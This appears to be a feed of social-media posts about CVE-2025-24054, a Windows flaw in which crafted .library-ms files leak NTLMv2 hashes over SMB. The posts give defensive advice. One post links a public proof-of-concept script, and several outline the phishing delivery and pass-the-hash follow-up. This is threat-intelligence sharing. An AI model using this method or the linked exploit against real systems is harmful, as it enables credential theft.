BMWaltCrazy example of a real NTLM exploit in action: a PDF, a single click, and boom—credentials compromised.
This is CVE-2025-24054 in the wild,
Stay sharp. The bad actors sure are.
#CyberSecurity #Infosec #NTLM #ThreatIntel #RedTeam #CVE202524054
YouTube
Brian WalterHeads up, security folks!
There’s a fresh CVE out in the wild—CVE-2025-24054—and it’s not messing around.
This one abuses Windows .library-ms files to sneakily leak your NTLMv2 hashes. Just previewing a malicious file could trigger it—no clicks needed. Yep, that easy for attackers to get their foot in the door.
The kicker? It’s already being exploited in the wild, just days after Microsoft’s patch dropped in March. First targets were spotted in Poland and Romania, but we all know these things don’t stay local for long.
What to do:
• Patch now (if you haven’t already).
• Block suspicious SMB traffic.
• Rethink NTLM—disable it where you can.
Full breakdown from Check Point here:
https://research.checkpoint.com/2025/cve-2025-24054-ntlm-exploit-in-the-wild/
#CyberSecurity #Infosec #Windows #NTLM #CVE202524054 #BlueTeam #PatchNow
CVE-2025-24054, NTLM Exploit in the Wild - Check Point Research
Key Points Introduction NTLM (New Technology LAN Manager) is a suite of authentication protocols developed by Microsoft to verify user identities and protect the integrity and confidentiality of network communications. NTLM operates through a direct client-server exchange known as the NTLM challenge/response mechanism, in which the server challenges the client to prove its identity without […]
BillOk, enough of this mooshy philosophical shit, let's talk tech.
Check out the mind blowingly simple 24054 PoC that is being used in active exploitation.
https://github.com/xigney/CVE-2025-24054_PoC/blob/main/PoC.py
Efani⚠️ CVE-2025-24054 is now under active attack — and it only takes a single click to leak NTLM hashes from a Windows system.
CISA has added this medium-severity Windows vulnerability to its Known Exploited Vulnerabilities catalog after confirming exploitation in the wild. The flaw enables attackers to harvest NTLM credentials through specially crafted .library-ms files.
Here’s how it works:
- A user receives a malicious file — even a single click (no execution needed) can trigger NTLM hash leakage
- Attackers send these files via phishing emails, often packed in ZIP archives or delivered directly
- Opening the archive or previewing the file initiates an SMB request, leaking NTLMv2-SSP hashes
- These hashes can then be used for pass-the-hash or lateral movement attacks inside the network
Check Point reports that the vulnerability has been exploited in at least 10 campaigns so far, targeting government and private organizations in Poland, Romania, Ukraine, and Colombia.
What makes this threat more dangerous:
- NTLM is deprecated but still present in many environments
- Minimal user interaction is required — just download and extract
- It bypasses common detection tools by triggering quietly in Windows Explorer
- It's a variant of a previously exploited flaw (CVE-2024-43451)
Microsoft patched the flaw in March, but exploitation began almost immediately. Agencies under the FCEB have until May 8 to patch — but every organization should act sooner.
At @Efani we view this as another reminder that legacy protocols like NTLM are low-hanging fruit for attackers. Even medium-severity flaws can become major risks when they require near-zero user interaction.
Patch. Audit. Replace legacy auth where possible.
#CyberSecurity #NTLM #WindowsVulnerability #CVE202524054 #CredentialSecurity #EfaniSecure
The DefendOps DiariesWindows systems are under threat! A tiny flaw now lets hackers steal sensitive credentials with just a folder click. How safe is your PC against these crafty phishing attacks? Read more on this alarming vulnerability.
#cve202524054
#windowsvulnerability
#ntlmhash
#cybersecurity
#phishingattacks